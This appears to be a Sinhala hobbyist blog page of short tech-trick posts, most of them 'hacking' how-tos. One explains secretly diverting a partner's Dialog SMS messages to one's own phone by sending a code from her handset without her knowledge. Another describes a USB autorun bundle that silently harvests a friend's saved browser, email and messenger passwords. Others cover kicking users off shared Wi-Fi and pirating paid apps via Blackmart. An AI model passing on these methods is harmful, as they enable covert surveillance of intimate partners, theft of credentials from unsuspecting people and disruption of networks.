Dialog SMS Hack කරමු ..


ඉතින් එහෙනම් වැඩේට බහිමුකො.
    දුක කියන්නේ මේ වැඩේ හරියටම හරියන්නේ Dialog - Dialog විතරයි. සමහර විට අනිත් සිම් වලටත් හරියනවා ඇති. කරල බලන්න.
    උදාහරණයකින්ම පැහැදිලි කරන්නම්කො. හිතන්න කොල්ලෙකුයි කෙල්ලෙකුයි ඉන්නවා. මේ කොල්ලට කෙල්ල ගැන සැකයි. ඉතින් කොල්ලට අවශ්‍ය වෙනව කෙල්ලට එන Sms ආදිය බලන්න. නමුත් කෙල්ල ඒකට ඉඩදෙන්නෑ. අන්න ඒ වගේ අවස්තාවකදී කෙල්ලගෙ 4න් එකේ sms හැක් කරන්න මේ ක්‍රමය භාවිත කරන්න පුලුවන්.
  1) මුලින්ම sms hack කරන්න ඕනා කෙනාගෙ 4n එක අරගන්න (උදාහරණයට අනුවනම් කෙල්ලගෙ 4n එක)
  2) දැන් mssage ලියන තැනට යන්න. (හොරෙන් කරපල්ල නැත්තන් කෙල්ලගෙන් ශොට් එක හම්බවෙයි)
  3) දැන් පහත තියෙන විදිහට ගහලා 9010 ට send කරන්න.
    DIV your phone numberදැං හරි. ඔය your phone number කියන තැනට ඔයාගෙ number එක ගහන්න.
EX-: DIV 077xxxxxxx
දැන් ඔයා මේ msg එක ගහපු phone එකට එන හැම massage එකක්ම එන්නෙ ඔයාගෙ Phone එකට. කොහොමද එල නේහ්.
  4) මෙය අක්‍රිය කිරීමට නැවතත්
     DIV DEL කියලා ටයිප් කරලා 9010 ට sent කරන්න.
එහෙනං ඉතින් අපි යන්නම්. මේක යහපත් දෙයකට පමණක් භාවිතාකරන්න. ලගදිම අනිත් සිම් වලත් මෙවැනි හැකර් වැඩ ගොඩාක් අරං එන්නම්.
පෝස්ට් එක තේරෙන්නෑ වගේ නම් මාත් එක්ක fb එකෙන් connect වෙන්න...
www.facebook.com

You Tube Videos ලේසියෙන්ම ඔන්ලින් download කරමු...

You Tube Videos ලේසියෙන්ම ඔන්ලින් download කරමු...


මේක හරිම ලේසියි. ඔයාලට තියෙන්නෙ මම පහලින් දෙන් වෙබ් සයිට් එකට ගිහින් ඔයාලට download කරගන්න ඔනෙ වීඩියෝ එකෙ ලින්ක් එක දෙන්න විතරයි.



මෙතනින් යන්න.



 මේකෙන් ඔයලට ඔනේ format එකක් තෝරන්නත් පුලුවන්..

opera mini වල සිංහල හදමු..

යාලුවනේ මන් අද ඔයාලට කියල දෙන්න යන්නේ opera mini වල සින්හල හදන හැටි. එහෙනම් වැඩේට බහිමු.
1) Opera mini open කරගන්න.
2) දැන් Addrrss Bar එකේ opera:config කියලා  type කරල ok දෙන්න.
3) ඉන් පසු එහි එන මෙනුවෙහි "use bitmap for complx script" කියලා තියෙන එක yes දීලා Save කරන්න. දැන් වැඩේ හරි.
කියපු දේ තේරුනේ නැතිනම් පහතින් තිබෙන පින්තූර බලන්න.වැඩේ හරි ගියානම් Comment එකක් දාන්න අමතක කරන්න එපා.

Play store එකේ සල්ලි දීල ගන්න තියෙන ඇප් නොමිලේ බාමු...

මෙම Blog අඩවියේ ඕනෑම Link එකක් Tag එකක් හෝ ඕනෑම ප්රඔවේශ සබැඳියකට ප්ර වේශ වන විට "SKIP ADD" යන්න Click කරන්න, එමෙන්ම ඔබ මෙම අඩවියට ජංගම දුරකතනයකින් පිවිසෙනවානම් CROME, FIREFOX, UC BROWSER, OPERA, වැනි BROWSERS පාවිච්චි කරන්න. UC MINI පාවිච්චි කරනවානම් එහි SPEED MODE ඔප්ශනය ඉවත් කර පිවිසෙන්න.
මෙන්න ඇප් එක ගන්න
Black mart



හොදනම් comment දාලම යන්න හොදේ...

wifi හැක්..

ඔන්න මන් අද ගෙනාව මගෙ දෙවනි පොස්ට් එක. මේක පොඩ්ඩක් හැකින වලට බරයි. මෙකෙන් වෙන්න මෙහෙම වැඩක්. හිතන්න ඔයාල නොමිලේ දෙන wifi ජාලයකට සම්බන්ද වෙල ඉන්නව කියල. මේ ඇප් එකෙන් පුලුවන් එම ජලයට සම්බන්ද වෙල ඉන්න අනිත් අයව ජාලයෙන් නෙරපා හරින්න. එතකොට ඔයාගේ internet speed එක වැඩි වෙනව, කරන්න තියෙන්න මෙච්චරයි. wifi connect උනාම ඔය ඇප් එක open කරල wifikill කියන option එක දෙන්න. එතකොට හරි.
මෙම Blog අඩවියේ ඕනෑම Link එකක් Tag එකක් හෝ ඕනෑම ප්රඔවේශ සබැඳියකට ප්ර වේශ වන විට "SKIP ADD" යන්න Click කරන්න, එමෙන්ම ඔබ මෙම අඩවියට ජංගම දුරකතනයකින් පිවිසෙනවානම් CROME, FIREFOX, UC BROWSER, OPERA, වැනි BROWSERS පාවිච්චි කරන්න. UC MINI පාවිච්චි කරනවානම් එහි SPEED MODE ඔප්ශනය ඉවත් කර පිවිසෙන්න.


මමහිතනව මෙකෙන් ඔයලට උදව්වක් වෙන්නති කියලා...

පෙන් ඩ්‍රයිව් එකක් භාවිතයෙන් පරිගනකයක ඇති ෆේස්බුක්,ජී මේල් ආදී ඕනෑම පාස්වර්ඩ්ස් හැක් කිරීම...

පෙන් ඩ්‍රයිව් එකක් භාවිතයෙන් පරිගනකයක ඇති ෆේස්බුක්,ජී මේල් ආදී ඕනෑම පාස්වර්ඩ්ස් හැක් කිරීම...

මේ මගේ මුල්ම පොස්ට් එක යලුවනේ. මම කියන්න යන්නේ ගොඩක් වැදගත් වගේම බොහොම ලේසි hacking method එකක් ගැන..මේක බොහොම ලේසි උනත් හරියටම වැඩ කරනවා...

දැන් බලමු මේක වැඩ කරන්නේ කොහොමද කියලා...


දැන් ඔයාලට පේනවා ඇති ඔය winrar archive එක ඇතුලේ
  1. autorun.exe
  2. autorun.inf
යනුවෙන් ෆයිල්ස් 2ක් තියනවා....

දැන් ඔයාල කල්පනා කරනවා ඇති මේ ෆයිල්ස් දෙකයි පෙන් එකයි විතරක් භාවිතා කරලා කොහොමද  හැක් කරන්නේ කියලා...හොදයි අපි බලමු...

මුලින්ම මේ autorun.exe කියන ෆයිල් එක මොකක්ද කියලා බලමු...
මම මේක හදලා තියෙන්නේ ෆයිල්ස් 7ක් එකට එකතු කරලා.ඒ තමා

  1. ChromePass.exe - මේකෙන් කරන්නේ පරිගනකයේ Google Chrome බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  2.  iepv.exe - මේකෙන් කරන්නේ පරිගනකයේ Internet Explorer බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  3.  mailpv.exe -  මේකෙන් කරන්නේ පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free වල save කර ඇති passwords ලබා ගැනීම
  4.  mspass.exe- මේකෙන් කරන්නේ පරිගනකයේ MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM වල save කර ඇති passwords ලබා ගැනීම
  5.  PasswordFox.exe - මේකෙන් කරන්නේ පරිගනකයේ FireFox බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  6.  pspv.exe - මේකෙන් කරන්නෙත් පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), වල save කර ඇති passwords ලබා ගැනීම
  7.  autorun.bat - මේකෙන් කරන්නේ අර උඩ කියපු පොඩි පොඩි ‍මෘදුකාංග වලින් ලබා ගන්නා passwords ඔබේ පෙන් එක තුල text files ආකාරයට සේව් කිරීම.
හරි දැන් මෙහෙමයි වැඩේ වෙන්නේ...

මුලින්ම  autorun.exe සහ autorun.inf ෆයිල්ස් 2 ඔයාගේ පෙන් එක තුලට කොපි කරන්න...

දැන් ඔයාගේ යාලුවෙක්ට පෙන් එක දෙන්න...(තව මොනව හරි අනන් මනන් ෆයිල්ස් ගොඩකුත් දාලා දෙන්න.නැත්තන් එයාගේ පාස්වර්ඩ් පෙන් එක තුලු සේව් වෙලා තියනවා කියලා දකී)

හරි දැන් මෙහෙමයි...ඔයාගේ යාලුවා පෙන් එක ගහපුවම autorun.exe ෆයිල් එක නිකන්ම run වෙන්න පටන් ගන්නවා...මම අර කිව්ව ෆයිල්ස් 7 ක්‍රියාත්මක වෙලා එයාගේ පරිගනකයේ සියලුම බ්‍රවුසර වල ඇති පාස්වර්ඩ්ස් ඔයාගේ පෙන් එක තුල text ෆයිල්ස් ආකාරයට සේව් වෙනවා.

දැන් ඔයාට පෙන් එක ලැබුනම එකේ තිබුන ෆයිල්ස් වලට අමතරව තවත් ෆයිල්ස් ගොඩක් හැදිල තියන විදිහ ඔයාට දකින්න පුලුවන්.ඒවාගෙන්

  • chrome.txt - ඔයාගේ යාලුවා chrome browser භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
  •  iepv.txt - ඔයාගේ යාලුවා Internet Explorer browser භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
  •  mailpv.txt - ඔයාගේ යාලුවා Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
  •  mspass.txt - ඔයාගේ යාලුවා MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
  •  passwordfox.txt - ඔයාගේ යාලුවා FireFox බ්‍රවුසරය භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
  •  pspv.txt - ඔයාගේ යාලුවා Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts) බ්‍රවුසරය භාවිතා කරනවා නම් එයාගේ පාස්වර්ඩ්ස් ඔක්කෝම මේ text ෆයිල් එක ඇතුලේ සේව් වෙලා තියනවා.
කොහොමද වැඩේ......තවත් පොස්ට් එකකින් හමුවෙමු...



How to make money on youtube

How to make money on youtube Once someone enters the internet world, they start to see many ways for them to earn money online. ...